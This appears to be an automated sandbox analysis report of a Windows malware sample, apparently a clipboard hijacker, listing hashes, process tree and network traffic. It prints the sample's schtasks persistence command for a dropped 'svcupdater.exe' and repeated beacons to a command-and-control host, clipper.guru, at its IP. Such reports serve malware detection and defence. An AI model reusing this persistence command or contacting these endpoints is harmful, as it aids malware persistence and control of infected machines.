Analysis
-
max time kernel: 291s
max time network: 295s
platform: windows10-1703_x64
resource: win10-20220812-en
resource tags: arch:x64, arch:x86, image:win10-20220812-en, locale:en-us, os:windows10-1703-x64, system
submitted: 02/11/2022, 22:18 UTC
Static task: static1
Behavioral task: behavioral1
  Sample: 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
  Resource: win7-20220901-en
Behavioral task: behavioral2
  Sample: 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
  Resource: win10-20220812-en
General
-
Target: 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
Size: 4.8MB
MD5: 80750ddfb5cfe9eb8e2adac60f372534
SHA1: a720efe2b3ef7735efd77de698a5576b36068d07
SHA256: 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
SHA512: bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f
SSDEEP: 49152:RAM2vrGxtRJHHc1RmqAhaShRgdGMYYqWxvdTBB0IEqYjla27EdS5g+A:mMgGxtU1RmqA3xsquvPEdZi+A
Malware Config
Signatures
-
Executes dropped EXE (1 IoC)
  pid   Process
  3976  svcupdater.exe
-
Creates scheduled task(s) (1 TTP, 1 IoC)
Schtasks is often used by malware for persistence or to perform post-infection execution.
  pid   Process
  3996  schtasks.exe
-
GoLang User-Agent (5 IoCs)
Uses default user-agent string defined by GoLang HTTP packages.
  description             flow  ioc
  HTTP User-Agent header  4     Go-http-client/1.1
  HTTP User-Agent header  7     Go-http-client/1.1
  HTTP User-Agent header  8     Go-http-client/1.1
  HTTP User-Agent header  10    Go-http-client/1.1
  HTTP User-Agent header  11    Go-http-client/1.1
-
Suspicious use of WriteProcessMemory (4 IoCs)
  description                        pid   Process                                                                 procid_target
  PID 2712 wrote to memory of 3512   2712  876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe  66
  PID 2712 wrote to memory of 3512   2712  876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe  66
  PID 3512 wrote to memory of 3996   3512  cmd.exe                                                                 68
  PID 3512 wrote to memory of 3996   3512  cmd.exe                                                                 68
Processes
-
C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04.exe"
  PID: 2712
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\cmd.exe
      Command line: cmd.exe "/C schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
      PID: 3512
      - Suspicious use of WriteProcessMemory
        C:\Windows\system32\schtasks.exe
          Command line: schtasks /create /tn \kBqZwNWVQe /tr \"C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe\" /st 00:00 /du 9999:59 /sc once /ri 1 /f"
          PID: 3996
          - Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
  Command line: C:\Users\Admin\AppData\Roaming\kBqZwNWVQe\svcupdater.exe
  PID: 3976
  - Executes dropped EXE
Network
-
DNS (remote address: 8.8.8.8:53)
Request: clipper.guru IN A
Response: clipper.guru IN A 45.159.189.115
-
HTTP GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:19:03 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:20:04 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:21:05 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
DNS (remote address: 8.8.8.8:53)
Request: clipper.guru IN A
Response: clipper.guru IN A 45.159.189.115
-
HTTP GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:22:06 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 429 Too Many Requests
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 169
Connection: keep-alive
-
HTTP GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 (process: svcupdater.exe)
Remote address: 45.159.189.115:80
Request:
GET /bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 HTTP/1.1
Host: clipper.guru
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
Response:
HTTP/1.1 200 OK
Date: Wed, 02 Nov 2022 22:23:07 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 803
Connection: keep-alive
-
322 B | 7
-
45.159.189.115:80 | http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 | http | svcupdater.exe | 679 B | 1.6kB | 7 | 6
  HTTP Request: GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 429
  HTTP Request: GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 200
-
45.159.189.115:80 | http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 | http | svcupdater.exe | 679 B | 1.6kB | 7 | 6
  HTTP Request: GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 429
  HTTP Request: GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 200
-
45.159.189.115:80 | http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 | http | svcupdater.exe | 679 B | 1.6kB | 7 | 6
  HTTP Request: GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 429
  HTTP Request: GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 200
-
45.159.189.115:80 | http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 | http | svcupdater.exe | 725 B | 1.6kB | 8 | 7
  HTTP Request: GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 429
  HTTP Request: GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 200
-
45.159.189.115:80 | http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7 | http | svcupdater.exe | 587 B | 1.5kB | 5 | 4
  HTTP Request: GET http://clipper.guru/bot/online?guid=EGWSITJI\Admin&key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 429
  HTTP Request: GET http://clipper.guru/bot/regex?key=f0cd0c3938331a84425c6e784f577ccd87bb667cfdb44cc24f97f402ac5e15b7
  HTTP Response: 200
MITRE ATT&CK Enterprise v6
Downloads
-
Filesize: 4.8MB
MD5: 80750ddfb5cfe9eb8e2adac60f372534
SHA1: a720efe2b3ef7735efd77de698a5576b36068d07
SHA256: 876e6f8cecf5d23d21e11a3a459357c763807614ba7d4ecee9c0537b5936da04
SHA512: bf4100fc99282c91ec03c8c234d320321e21e5e4120c45c2cd5cfeaffcf07d4e67143e61407b570448bea16b44ed0bf7ad720e61ca2ae5d30d804c5fc8266d6f